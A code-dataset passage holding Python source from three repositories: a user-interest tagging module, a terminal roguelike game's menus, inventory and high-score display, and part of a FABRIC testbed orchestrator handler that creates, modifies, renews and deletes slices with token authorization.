followed_company = interests['followed_company']\n for k,v in company_result.items():\n if k in followed_company:\n v['is_followed'] = True\n else:\n v['is_followed'] = False\n result['companies'] = company_result\n else:\n result['companies'] = {}\n if academy_result:\n followed_academy = interests['followed_academy']\n for k,v in academy_result.items():\n if k in followed_academy:\n v['is_followed'] = True\n else:\n v['is_followed'] = False\n result['academies'] = academy_result\n else:\n result['academies'] = {}\n\n if terminology_result:\n followed_skill = interests['followed_skill']\n terminology = self._is_termnolgoy_followed(terminology_result, followed_skill)\n result['terminologys'] = terminology_result\n else:\n result['terminologys'] = {}\n\n return result\n\n def _is_termnolgoy_followed(self, terminology_result, followed_skill):\n for k, v in terminology_result.items():\n if k == 'terminology_detail':\n if v['name'] in followed_skill:\n v['is_followed'] = True\n else:\n v['is_followed'] = False\n elif type(v) == list:\n for item in v:\n self._is_termnolgoy_followed(item, followed_skill)\n elif type(v) == dict:\n self._is_termnolgoy_followed(v, followed_skill)\n return terminology_result\n","repo_name":"Will-Holden/kb_demo","sub_path":"online_processor/core/user/UserCore.py","file_name":"UserCore.py","file_ext":"py","file_size_in_byte":5396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25063334519","text":"from filehandling import unfile\nfrom movement import getch\nfrom clear import resize_and_clear as clear\nfrom button import change_button as button\nfrom about import print_about as about\nfrom introscreen import intro as intro\n\ndef logo(): # printing logo\n with open(\"menu.uie\") as picture:\n for line in picture:\n print(line[:-1])\n\n # maps, current_choice, last_input, user\n\n\ndef display_menu(args):\n \n maps = args['maps']\n current_choice = args['current_choice']\n user_input = args['last_input']\n user = args['player']\n \n user.reset()\n logo()\n \n current_choice = button(user_input, current_choice)\n \n print('\\n\\n')\n print(\"player:\".rjust(65), \"name:\".rjust(24))\n print(user.player_char.rjust(71), user.name.rjust(27))\n user_input = getch()\n\n if user_input == '\\r' and current_choice == 4:\n return\n if user_input == '\\r' and current_choice == 1:\n # Change map to lvl 1\n # Can be modified to show story\n\n clear()\n intro()\n board = unfile(maps[1])\n original_board = unfile(maps[1])\n return (1, None, board, original_board)\n\n if user_input == '\\r' and current_choice == 2:\n # Change to about screen\n\n clear()\n about()\n clear()\n logo()\n return ('menu', current_choice, user_input)\n\n if user_input == '\\r' and current_choice == 3:\n # Change to about screen\n\n clear()\n about()\n clear()\n logo()\n return ('menu', current_choice, user_input)\n\n else:\n clear()\n logo()\n return ('menu', current_choice, user_input)\n\ndef inventory(player):\n # numbers in rjust are calculated to sum up \n # with characters to 55 becase this is the length of first print\n # all is made to be a visual representation of what is to be printed\n print(\"=============================================\")\n print(\"#\")\n print('#', \"Gold:\".rjust(19),\n '{}'.rjust(11).format(player.gold))\n print('#', \"Helath potions:\".rjust(19),\n '{}'.rjust(11).format(player.potions))\n print(\"#\")\n print(\"+++++++++++++++++++++++++++++++++++++++++++++\")\n print('#', '\\x1b[0;33m{}\\x1b[0m'.rjust(10).format(player.name),\n '{}'.rjust(5).format(player.player_char),\n 'Life:'.rjust(8),\n '{}'.rjust(10).format(player.life))\n print('#')\n print('#', 'Level:'.rjust(19),\n '{}'.rjust(11).format(player.level))\n print('#', 'Experience:'.rjust(19),\n '{}'.rjust(11).format(player.exp))\n print('#', 'Enemies killed:'.rjust(19),\n '{}'.rjust(11).format(player.enemies_killed))\n print('#')\n print('=============================================')\n print('\\nTo exit press any key.\\n')\n getch()\n \ndef hall_of_fame(player):\n score = player.enemies_killed*player.level + player.lifes + player.exp\n hscores = []\n with open('hscores') as table:\n for line in table:\n hscores.append(line.split(','))\n if score >= hscores[0][1]:\n to_write = str(score) + ',' + str(player.name)\n print('TOP SCORE : ', player.name, \": \", score)\n with open('hscores','w') as table:\n table.write(to_write)\n else:\n print('TOP SCORE : ', hscores[1], \": \", hscores[0])\n","repo_name":"DrMayx/RougeGameG14","sub_path":"menus.py","file_name":"menus.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25656818461","text":"import time\nimport traceback\nfrom datetime import datetime, timedelta, timezone\nfrom http.client import NOT_FOUND, BAD_REQUEST, UNAUTHORIZED\nfrom typing import List, Dict, Tuple\n\nfrom fabric_mb.message_bus.messages.auth_avro import AuthAvro\nfrom fabric_mb.message_bus.messages.poa_avro import PoaAvro\nfrom fabric_mb.message_bus.messages.reservation_mng import ReservationMng\nfrom fabric_mb.message_bus.messages.slice_avro import SliceAvro\nfrom fim.graph.networkx_property_graph_disjoint import NetworkXGraphImporterDisjoint\nfrom fim.slivers.base_sliver import BaseSliver\nfrom fim.slivers.network_service import NetworkServiceSliver\nfrom fim.user import GraphFormat\nfrom fim.user.topology import ExperimentTopology\n\nfrom fabric_cf.actor.core.common.event_logger import EventLogger, EventLoggerSingleton\nfrom fabric_cf.actor.core.kernel.poa import PoaStates\nfrom fabric_cf.actor.core.kernel.reservation_states import ReservationStates\nfrom fabric_cf.actor.core.time.actor_clock import ActorClock\nfrom fabric_cf.actor.fim.fim_helper import FimHelper\nfrom fabric_cf.actor.core.apis.abc_mgmt_controller_mixin import ABCMgmtControllerMixin\nfrom fabric_cf.actor.core.common.constants import Constants, ErrorCodes\nfrom fabric_cf.actor.core.kernel.slice_state_machine import SliceState\nfrom fabric_cf.actor.core.util.id import ID\nfrom fabric_cf.actor.security.fabric_token import FabricToken\nfrom fabric_cf.actor.security.pdp_auth import ActionId\nfrom fabric_cf.orchestrator.core.exceptions import OrchestratorException\nfrom fabric_cf.orchestrator.core.orchestrator_slice_wrapper import OrchestratorSliceWrapper\nfrom fabric_cf.orchestrator.core.orchestrator_kernel import OrchestratorKernelSingleton\nfrom fabric_cf.orchestrator.core.response_builder import ResponseBuilder\n\n\nclass OrchestratorHandler:\n def __init__(self):\n self.controller_state = OrchestratorKernelSingleton.get()\n from fabric_cf.actor.core.container.globals import GlobalsSingleton\n self.globals = GlobalsSingleton.get()\n self.logger = self.globals.get_logger()\n self.jwks_url = self.globals.get_config().get_oauth_config().get(Constants.PROPERTY_CONF_O_AUTH_JWKS_URL, None)\n self.pdp_config = self.globals.get_config().get_global_config().get_pdp_config()\n\n def get_logger(self):\n \"\"\"\n Get Logger\n :return: logger\n \"\"\"\n return self.logger\n\n def __authorize_request(self, *, id_token: str, action_id: ActionId,\n resource: BaseSliver or ExperimentTopology = None,\n lease_end_time: datetime = None) -> FabricToken:\n \"\"\"\n Authorize request\n :param id_token:\n :param action_id:\n :param resource:\n :param lease_end_time:\n :return:\n \"\"\"\n from fabric_cf.actor.security.access_checker import AccessChecker\n fabric_token = AccessChecker.check_access(action_id=action_id, token=id_token, logger=self.logger,\n resource=resource, lease_end_time=lease_end_time)\n\n if fabric_token.get_subject() is None:\n raise OrchestratorException(http_error_code=UNAUTHORIZED,message=\"Invalid token\")\n return fabric_token\n\n def get_broker(self, *, controller: ABCMgmtControllerMixin) -> ID:\n \"\"\"\n Get broker\n :param controller:\n :return:\n \"\"\"\n try:\n if self.controller_state.get_broker() is not None:\n return self.controller_state.get_broker()\n\n brokers = controller.get_brokers()\n self.logger.debug(f\"Brokers: {brokers}\")\n self.logger.error(f\"Last Error: {controller.get_last_error()}\")\n if brokers is not None:\n result = ID(uid=next(iter(brokers), None).get_guid())\n self.controller_state.set_broker(broker=result)\n return result\n except Exception as e:\n self.logger.error(f\"Error occurred: {e}\", stack_info=True)\n\n def discover_broker_query_model(self, *, controller: ABCMgmtControllerMixin, token: str = None,\n level: int = 10, graph_format: GraphFormat = GraphFormat.GRAPHML,\n force_refresh: bool = False) -> str or None:\n \"\"\"\n Discover all the available resources by querying Broker\n :param controller Management Controller Object\n :param token Fabric Token\n :param level: level of details\n :param graph_format: Graph format\n :param force_refresh: Force fetching a fresh model from Broker\n :return str or None\n \"\"\"\n broker_query_model = None\n saved_bqm = self.controller_state.get_saved_bqm(graph_format=graph_format, level=level)\n if saved_bqm is not None:\n if not force_refresh and not saved_bqm.can_refresh() and not saved_bqm.refresh_in_progress:\n broker_query_model = saved_bqm.get_bqm()\n else:\n saved_bqm.start_refresh()\n\n if broker_query_model is None:\n broker = self.get_broker(controller=controller)\n if broker is None:\n raise OrchestratorException(\"Unable to determine broker proxy for this controller. \"\n \"Please check Orchestrator container configuration and logs.\")\n\n model = controller.get_broker_query_model(broker=broker, id_token=token, level=level,\n graph_format=graph_format)\n if model is None or model.get_model() is None or model.get_model() == '':\n raise OrchestratorException(http_error_code=NOT_FOUND, message=f\"Resource(s) not found for \"\n f\"level: {level} format: {graph_format}!\")\n broker_query_model = model.get_model()\n\n self.controller_state.save_bqm(bqm=broker_query_model, graph_format=graph_format, level=level)\n\n return broker_query_model\n\n def list_resources(self, *, token: str, level: int, force_refresh: bool = False) -> dict:\n \"\"\"\n List Resources\n :param token Fabric Identity Token\n :param level: level of details (default set to 1)\n :param force_refresh: force fetching bqm from broker and override the cached model\n :raises Raises an exception in case of failure\n :returns Broker Query Model on success\n \"\"\"\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"list_resources invoked controller:{controller}\")\n\n self.__authorize_request(id_token=token, action_id=ActionId.query)\n \n broker_query_model = self.discover_broker_query_model(controller=controller, token=token, level=level,\n force_refresh=force_refresh)\n\n return ResponseBuilder.get_broker_query_model_summary(bqm=broker_query_model)\n\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing list_resources e: {e}\")\n raise e\n\n def portal_list_resources(self, *, graph_format_str: str) -> dict:\n \"\"\"\n List Resources\n :param graph_format_str: Graph format\n :raises Raises an exception in case of failure\n :returns Broker Query Model on success\n \"\"\"\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"portal_list_resources invoked controller:{controller}\")\n\n broker_query_model = None\n graph_format = self.__translate_graph_format(graph_format=graph_format_str)\n broker_query_model = self.discover_broker_query_model(controller=controller, level=1,\n graph_format=graph_format)\n return ResponseBuilder.get_broker_query_model_summary(bqm=broker_query_model)\n\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing portal_list_resources e: {e}\")\n raise e\n\n def create_slice(self, *, token: str, slice_name: str, slice_graph: str, ssh_key: str,\n lease_end_time: str) -> List[dict]:\n \"\"\"\n Create a slice\n :param token Fabric Identity Token\n :param slice_name Slice Name\n :param slice_graph Slice Graph Model\n :param ssh_key: User ssh key\n :param lease_end_time: Lease End Time (UTC)\n :raises Raises an exception in case of failure\n :returns List of reservations created for the Slice on success\n \"\"\"\n start = time.time()\n slice_id = None\n controller = None\n new_slice_object = None\n asm_graph = None\n topology = None\n try:\n from fabric_cf.actor.security.access_checker import AccessChecker\n fabric_token = AccessChecker.validate_and_decode_token(token=token, logger=self.logger)\n project, tags, project_name = fabric_token.get_first_project()\n allow_long_lived = True if Constants.SLICE_NO_LIMIT_LIFETIME in tags else False\n end_time = self.__validate_lease_end_time(lease_end_time=lease_end_time, allow_long_lived=allow_long_lived)\n\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"create_slice invoked for Controller: {controller}\")\n\n # Validate the slice graph\n create_ts = time.time()\n topology = ExperimentTopology(graph_string=slice_graph, importer=NetworkXGraphImporterDisjoint())\n topology.validate()\n self.logger.info(f\"TV validate: TIME= {time.time() - create_ts:.0f}\")\n\n create_ts = time.time()\n asm_graph = FimHelper.get_neo4j_asm_graph(slice_graph=topology.serialize())\n self.logger.info(f\"ASM load: TIME= {time.time() - create_ts:.0f}\")\n\n # Authorize the slice\n create_ts = time.time()\n self.__authorize_request(id_token=token, action_id=ActionId.create, resource=topology,\n lease_end_time=end_time)\n self.logger.info(f\"PDP authorize: TIME= {time.time() - create_ts:.0f}\")\n\n # Check if an Active slice exists already with the same name for the user\n create_ts = time.time()\n if tags is not None and isinstance(tags, list):\n tags = ','.join(tags)\n existing_slices = controller.get_slices(slice_name=slice_name, email=fabric_token.get_email(),\n project=project)\n self.logger.info(f\"GET slices: TIME= {time.time() - create_ts:.0f}\")\n\n if existing_slices is not None and len(existing_slices) != 0:\n for es in existing_slices:\n slice_state = SliceState(es.get_state())\n if not SliceState.is_dead_or_closing(state=slice_state):\n raise OrchestratorException(f\"Slice {slice_name} already exists\")\n\n broker = self.get_broker(controller=controller)\n if broker is None:\n raise OrchestratorException(\"Unable to determine broker proxy for this controller. \"\n \"Please check Orchestrator container configuration and logs.\")\n\n slice_obj = SliceAvro()\n slice_obj.set_slice_name(slice_name)\n slice_obj.set_client_slice(True)\n slice_obj.set_description(\"Description\")\n slice_obj.graph_id = asm_graph.get_graph_id()\n slice_obj.set_config_properties(value={Constants.USER_SSH_KEY: ssh_key,\n Constants.PROJECT_ID: project,\n Constants.TAGS: tags,\n Constants.CLAIMS_EMAIL: fabric_token.get_email()})\n slice_obj.set_lease_end(lease_end=end_time)\n auth = AuthAvro()\n auth.name = self.controller_state.get_management_actor().get_name()\n auth.guid = self.controller_state.get_management_actor().get_guid()\n auth.oidc_sub_claim = fabric_token.get_uuid()\n auth.email = fabric_token.get_email()\n slice_obj.set_owner(auth)\n slice_obj.set_project_id(project)\n slice_obj.set_project_name(project_name)\n\n create_ts = time.time()\n self.logger.debug(f\"Adding Slice {slice_name}\")\n slice_id = controller.add_slice(slice_obj=slice_obj)\n self.logger.info(f\"SLC add slices: TIME= {time.time() - create_ts:.0f}\")\n if slice_id is None:\n self.logger.error(controller.get_last_error())\n self.logger.error(\"Slice could not be added to Database\")\n raise OrchestratorException(\"Slice could not be added to Database\")\n self.logger.debug(f\"Slice {slice_name}/{slice_id} added successfully\")\n\n slice_obj.set_slice_id(slice_id=str(slice_id))\n new_slice_object = OrchestratorSliceWrapper(controller=controller, broker=broker,\n slice_obj=slice_obj, logger=self.logger)\n\n create_ts = time.time()\n new_slice_object.lock()\n\n # Create Slivers from Slice Graph; Compute Reservations from Slivers;\n computed_reservations = new_slice_object.create(slice_graph=asm_graph)\n\n # Check if Testbed in Maintenance or Site in Maintenance\n self.check_maintenance_mode(token=fabric_token, reservations=computed_reservations)\n\n # Add Reservations to relational database;\n new_slice_object.add_reservations()\n\n self.logger.info(f\"OC wrapper: TIME= {time.time() - create_ts:.0f}\")\n\n # Enqueue the slice on the demand thread\n # Demand thread is responsible for demanding the reservations\n # Helps improve the create response time\n create_ts = time.time()\n self.controller_state.get_defer_thread().queue_slice(controller_slice=new_slice_object)\n self.logger.info(f\"QU queue: TIME= {time.time() - create_ts:.0f}\")\n EventLoggerSingleton.get().log_slice_event(slice_object=slice_obj, action=ActionId.create,\n topology=topology)\n\n return ResponseBuilder.get_reservation_summary(res_list=computed_reservations)\n except Exception as e:\n if slice_id is not None and controller is not None and asm_graph is not None:\n FimHelper.delete_graph(graph_id=asm_graph.graph_id)\n controller.remove_slice(slice_id=slice_id)\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing create_slice e: {e}\")\n raise e\n finally:\n if topology is not None and topology.graph_model is not None:\n topology.graph_model.delete_graph()\n if new_slice_object is not None:\n new_slice_object.unlock()\n self.logger.info(f\"OH : TIME= {time.time() - start:.0f}\")\n\n def get_slivers(self, *, token: str, slice_id: str, sliver_id: str = None, as_self: bool = True) -> List[dict]:\n \"\"\"\n Get Slivers for a Slice\n :param token Fabric Identity Token\n :param slice_id Slice Id\n :param sliver_id Sliver Id\n :param as_self flag; True - return calling user's slivers otherwise, return all slivers in the project\n :raises Raises an exception in case of failure\n :returns List of reservations created for the Slice on success\n \"\"\"\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"get_slivers invoked for Controller: {controller}\")\n\n slice_guid = ID(uid=slice_id) if slice_id is not None else None\n rid = ID(uid=sliver_id) if sliver_id is not None else None\n\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.query)\n\n # Filter slices based on user's email only when querying as_self\n email = fabric_token.get_email()\n if not as_self:\n email = None\n\n reservations = controller.get_reservations(slice_id=slice_guid, rid=rid, email=email)\n if reservations is None:\n if controller.get_last_error() is not None:\n self.logger.error(controller.get_last_error())\n if controller.get_last_error().status.code == ErrorCodes.ErrorNoSuchSlice:\n raise OrchestratorException(f\"Slice# {slice_id} not found\",\n http_error_code=NOT_FOUND)\n elif controller.get_last_error().status.code == ErrorCodes.ErrorNoSuchReservation:\n raise OrchestratorException(f\"Reservation# {rid} not found\",\n http_error_code=NOT_FOUND)\n\n raise OrchestratorException(f\"Slice# {slice_id} has no reservations\",\n http_error_code=NOT_FOUND)\n\n return ResponseBuilder.get_reservation_summary(res_list=reservations)\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing get_slivers e: {e}\")\n raise e\n\n def get_slices(self, *, token: str, states: List[str], name: str, limit: int, offset: int,\n as_self: bool = True) -> List[dict]:\n \"\"\"\n Get User Slices\n :param token Fabric Identity Token\n :param states Slice states\n :param name Slice name\n :param limit Number of slices to return\n :param offset Offset\n :param as_self flag; True - return calling user's slices otherwise, return all slices in the project\n :raises Raises an exception in case of failure\n :returns List of Slices on success\n \"\"\"\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"get_slices invoked for Controller: {controller}\")\n\n slice_states = SliceState.translate_list(states=states)\n\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.query)\n\n projects = fabric_token.get_projects()\n project = None\n if len(projects) == 1:\n project, tags, project_name = fabric_token.get_first_project()\n else:\n as_self = True\n\n # Filter slices based on user's email only when querying as_self\n email = fabric_token.get_email()\n if not as_self:\n email = None\n slice_list = controller.get_slices(states=slice_states, email=email, project=project,\n slice_name=name, limit=limit, offset=offset)\n return ResponseBuilder.get_slice_summary(slice_list=slice_list)\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing get_slices e: {e}\")\n raise e\n\n def modify_slice(self, *, token: str, slice_id: str, slice_graph: str) -> List[dict]:\n \"\"\"\n Modify a slice\n :param token Fabric Identity Token\n :param slice_id Slice Id\n :param slice_graph Slice Graph Model\n :param ssh_key ssh_key\n :raises Raises an exception in case of failure\n :returns List of reservations created for the Slice on success\n \"\"\"\n asm_graph = None\n topology = None\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"modify_slice invoked for Controller: {controller}\")\n\n # Check if an Active slice exists already with the same name for the user\n slice_list = controller.get_slices(slice_id=slice_id)\n if slice_list is None or len(slice_list) == 0:\n if controller.get_last_error() is not None:\n self.logger.error(controller.get_last_error())\n raise OrchestratorException(f\"User# has no Slices\",\n http_error_code=NOT_FOUND)\n\n slice_obj = next(iter(slice_list))\n if slice_obj.get_graph_id() is None:\n raise OrchestratorException(f\"Slice# {slice_obj} does not have graph id\")\n\n slice_state = SliceState(slice_obj.get_state())\n\n if not SliceState.is_stable(state=slice_state):\n self.logger.info(f\"Unable to modify Slice# {slice_id} that is not yet stable, try again later\")\n raise OrchestratorException(f\"Unable to modify Slice# {slice_id} that is not yet stable, \"\n f\"try again later\")\n\n # Validate the slice graph\n topology = ExperimentTopology(graph_string=slice_graph, importer=NetworkXGraphImporterDisjoint())\n topology.validate()\n\n asm_graph = FimHelper.get_neo4j_asm_graph(slice_graph=topology.serialize())\n\n # Authorize the slice\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.modify, resource=topology)\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.create, resource=topology)\n project, tags, project_name = fabric_token.get_first_project()\n broker = self.get_broker(controller=controller)\n if broker is None:\n raise OrchestratorException(\"Unable to determine broker proxy for this controller. \"\n \"Please check Orchestrator container configuration and logs.\")\n\n slice_object = OrchestratorSliceWrapper(controller=controller, broker=broker,\n slice_obj=slice_obj, logger=self.logger)\n\n # Compute the reservations\n computed_reservations = slice_object.modify(new_slice_graph=asm_graph)\n\n # Check if Test Bed or site is in maintenance\n self.check_maintenance_mode(token=fabric_token, reservations=computed_reservations)\n\n # Add any new reservations to the database\n slice_object.add_reservations()\n\n FimHelper.delete_graph(graph_id=slice_obj.get_graph_id())\n\n slice_obj.graph_id = asm_graph.get_graph_id()\n config_props = slice_obj.get_config_properties()\n config_props[Constants.PROJECT_ID] = project\n config_props[Constants.TAGS] = ','.join(tags)\n slice_obj.set_config_properties(value=config_props)\n\n if not controller.update_slice(slice_obj=slice_obj, modify_state=True):\n self.logger.error(f\"Failed to update slice: {slice_id} error: {controller.get_last_error()}\")\n\n # Enqueue the slice on the demand thread\n # Demand thread is responsible for demanding the reservations\n # Helps improve the create response time\n self.controller_state.get_defer_thread().queue_slice(controller_slice=slice_object)\n\n EventLoggerSingleton.get().log_slice_event(slice_object=slice_obj, action=ActionId.modify,\n topology=topology)\n return ResponseBuilder.get_reservation_summary(res_list=computed_reservations)\n except Exception as e:\n if asm_graph is not None:\n FimHelper.delete_graph(graph_id=asm_graph.get_graph_id())\n\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing modify_slice e: {e}\")\n raise e\n finally:\n if topology is not None and topology.graph_model is not None:\n topology.graph_model.delete_graph()\n\n def delete_slices(self, *, token: str, slice_id: str = None):\n \"\"\"\n Delete a user slice identified by slice_id if specified otherwise all user slices within a project\n :param token Fabric Identity Token\n :param slice_id Slice Id\n :raises Raises an exception in case of failure\n \"\"\"\n try:\n failed_to_delete_slice_ids = []\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"delete_slice invoked for Controller: {controller}\")\n\n slice_guid = ID(uid=slice_id) if slice_id is not None else None\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.delete)\n project, tags, project_name = fabric_token.get_first_project()\n\n self.logger.debug(f\"Get Slices: {project} {fabric_token.get_email()} \")\n states = None\n if slice_guid is None:\n states = [SliceState.StableError.value,\n SliceState.StableOK.value,\n SliceState.ModifyOK.value,\n SliceState.ModifyError.value]\n slice_list = controller.get_slices(slice_id=slice_guid, email=fabric_token.get_email(),\n project=project, states=states)\n\n if slice_list is None or len(slice_list) == 0:\n if slice_id is not None:\n msg = f\"Slice# {slice_id} not found\"\n raise OrchestratorException(msg, http_error_code=NOT_FOUND)\n\n self.__authorize_request(id_token=token, action_id=ActionId.delete)\n\n for slice_object in slice_list:\n slice_state = SliceState(slice_object.get_state())\n if SliceState.is_dead_or_closing(state=slice_state):\n self.logger.debug(f\"Slice# {slice_object.get_slice_id()} already closed\")\n continue\n\n if not SliceState.is_stable(state=slice_state) and not SliceState.is_modified(state=slice_state):\n self.logger.info(f\"Unable to delete Slice# {slice_object.get_slice_id()} that is not yet stable, \"\n f\"try again later\")\n failed_to_delete_slice_ids.append(slice_object.get_slice_id())\n continue\n\n controller.close_reservations(slice_id=ID(uid=slice_object.get_slice_id()))\n if len(failed_to_delete_slice_ids) > 0:\n raise OrchestratorException(f\"Unable to delete Slices {failed_to_delete_slice_ids} that are not yet \"\n f\"stable, try again later\")\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing delete_slice e: {e}\")\n raise e\n\n def modify_accept(self, *, token: str, slice_id: str) -> dict:\n \"\"\"\n Accept the last modify on the slice\n :param token Fabric Identity Token\n :param slice_id Slice Id\n :raises Raises an exception in case of failure\n :returns Slice Graph on success\n \"\"\"\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"modify_accept invoked for Controller: {controller}\")\n\n slice_guid = ID(uid=slice_id) if slice_id is not None else None\n\n # TODO change this to accept\n self.__authorize_request(id_token=token, action_id=ActionId.modify)\n\n slice_list = controller.get_slices(slice_id=slice_guid)\n if slice_list is None or len(slice_list) == 0:\n if controller.get_last_error() is not None:\n self.logger.error(controller.get_last_error())\n raise OrchestratorException(f\"User# has no Slices\",\n http_error_code=NOT_FOUND)\n\n slice_obj = next(iter(slice_list))\n slice_state = SliceState(slice_obj.get_state())\n if not SliceState.is_modified(state=slice_state):\n self.logger.info(f\"Unable to accept modify Slice# {slice_guid} that was not modified\")\n raise OrchestratorException(f\"Unable to accept modify Slice# {slice_guid} that was not modified\")\n\n if slice_obj.get_graph_id() is None:\n raise OrchestratorException(f\"Slice# {slice_obj} does not have graph id\")\n\n slice_topology = FimHelper.prune_graph(graph_id=slice_obj.get_graph_id())\n\n controller.accept_update_slice(slice_id=ID(uid=slice_id))\n\n slice_model_str = slice_topology.serialize()\n return ResponseBuilder.get_slice_summary(slice_list=slice_list, slice_model=slice_model_str)[0]\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing modify_accept e: {e}\")\n raise e\n\n def get_slice_graph(self, *, token: str, slice_id: str, graph_format_str: str, as_self: bool) -> dict:\n \"\"\"\n Get User Slice\n :param token Fabric Identity Token\n :param slice_id Slice Id\n :param graph_format_str\n :param as_self flag; True - return calling user's slices otherwise, return all slices in the project\n :raises Raises an exception in case of failure\n :returns Slice Graph on success\n \"\"\"\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"get_slice_graph invoked for Controller: {controller}\")\n\n slice_guid = ID(uid=slice_id) if slice_id is not None else None\n\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.query)\n\n # Filter slices based on user's email only when querying as_self\n email = fabric_token.get_email()\n if not as_self:\n email = None\n\n slice_list = controller.get_slices(slice_id=slice_guid, email=email)\n if slice_list is None or len(slice_list) == 0:\n if controller.get_last_error() is not None:\n self.logger.error(controller.get_last_error())\n raise OrchestratorException(f\"User# has no Slices\",\n http_error_code=NOT_FOUND)\n\n slice_obj = next(iter(slice_list))\n\n if slice_obj.get_graph_id() is None:\n raise OrchestratorException(f\"Slice# {slice_obj} does not have graph id\")\n\n slice_model = FimHelper.get_graph(graph_id=slice_obj.get_graph_id())\n\n graph_format = self.__translate_graph_format(graph_format=graph_format_str)\n if graph_format == GraphFormat.JSON_NODELINK:\n slice_model_str = slice_model.serialize_graph()\n slice_model = FimHelper.get_networkx_graph_from_string(graph_str=slice_model_str)\n\n if slice_model is None:\n raise OrchestratorException(f\"Slice# {slice_obj} graph could not be loaded\")\n\n slice_model_str = slice_model.serialize_graph(format=graph_format)\n return ResponseBuilder.get_slice_summary(slice_list=slice_list, slice_model=slice_model_str)[0]\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing get_slice_graph e: {e}\")\n raise e\n\n def renew_slice(self, *, token: str, slice_id: str, new_lease_end_time: str):\n \"\"\"\n Renew a slice\n :param token Fabric Identity Token\n :param slice_id Slice Id\n :param new_lease_end_time: New Lease End Time in UTC in '%Y-%m-%d %H:%M:%S %z' format\n :raises Raises an exception in case of failure\n :return:\n \"\"\"\n failed_to_extend_rid_list = []\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"renew_slice invoked for Controller: {controller}\")\n\n slice_guid = ID(uid=slice_id) if slice_id is not None else None\n slice_list = controller.get_slices(slice_id=slice_guid)\n\n if slice_list is None or len(slice_list) == 0:\n raise OrchestratorException(f\"Slice# {slice_id} not found\",\n http_error_code=NOT_FOUND)\n\n slice_object = next(iter(slice_list))\n\n slice_state = SliceState(slice_object.get_state())\n if SliceState.is_dead_or_closing(state=slice_state):\n raise OrchestratorException(f\"Slice# {slice_id} already closed\",\n http_error_code=BAD_REQUEST)\n\n if not SliceState.is_stable(state=slice_state) and not SliceState.is_modified(state=slice_state):\n self.logger.info(f\"Unable to renew Slice# {slice_guid} that is not yet stable, try again later\")\n raise OrchestratorException(f\"Unable to renew Slice# {slice_guid} that is not yet stable, \"\n f\"try again later\")\n\n from fabric_cf.actor.security.access_checker import AccessChecker\n fabric_token = AccessChecker.validate_and_decode_token(token=token, logger=self.logger)\n project, tags, project_name = fabric_token.get_first_project()\n allow_long_lived = True if Constants.SLICE_NO_LIMIT_LIFETIME in tags else False\n new_end_time = self.__validate_lease_end_time(lease_end_time=new_lease_end_time,\n allow_long_lived=allow_long_lived)\n\n reservations = controller.get_reservations(slice_id=slice_id)\n if reservations is None or len(reservations) < 1:\n if controller.get_last_error() is not None:\n self.logger.error(controller.get_last_error())\n raise OrchestratorException(f\"Slice# {slice_id} has no reservations\")\n\n self.logger.debug(f\"There are {len(reservations)} reservations in the slice# {slice_id}\")\n\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.renew, lease_end_time=new_end_time)\n self.check_maintenance_mode(token=fabric_token, reservations=reservations)\n for r in reservations:\n res_state = ReservationStates(r.get_state())\n if res_state == ReservationStates.Closed or res_state == ReservationStates.Failed or \\\n res_state == ReservationStates.CloseWait:\n continue\n\n current_end_time = ActorClock.from_milliseconds(milli_seconds=r.get_end())\n\n if new_end_time < current_end_time:\n raise OrchestratorException(f\"Attempted new term end time is shorter than current slice end time\")\n\n self.logger.debug(f\"Extending reservation with reservation# {r.get_reservation_id()}\")\n result = controller.extend_reservation(reservation=ID(uid=r.get_reservation_id()),\n new_end_time=new_end_time,\n sliver=None)\n if not result:\n self.logger.error(f\"Error: {controller.get_last_error()}\")\n failed_to_extend_rid_list.append(r.get_reservation_id())\n\n if len(failed_to_extend_rid_list) == 0:\n slice_object.set_lease_end(lease_end=new_end_time)\n if not controller.update_slice(slice_obj=slice_object):\n self.logger.error(f\"Failed to update lease end time: {new_end_time} in Slice: {slice_object}\")\n self.logger.error(controller.get_last_error())\n\n if len(failed_to_extend_rid_list) > 0:\n raise OrchestratorException(f\"Failed to extend reservation# {failed_to_extend_rid_list}\")\n\n EventLoggerSingleton.get().log_slice_event(slice_object=slice_object, action=ActionId.renew)\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing renew e: {e}\")\n raise e\n\n def __validate_lease_end_time(self, lease_end_time: str, allow_long_lived: bool = False) -> datetime:\n \"\"\"\n Validate Lease End Time\n :param lease_end_time: New End Time\n :param allow_long_lived: Allow long lived tokens\n :return End Time\n :raises Exception if new end time is in past\n \"\"\"\n if lease_end_time is None:\n 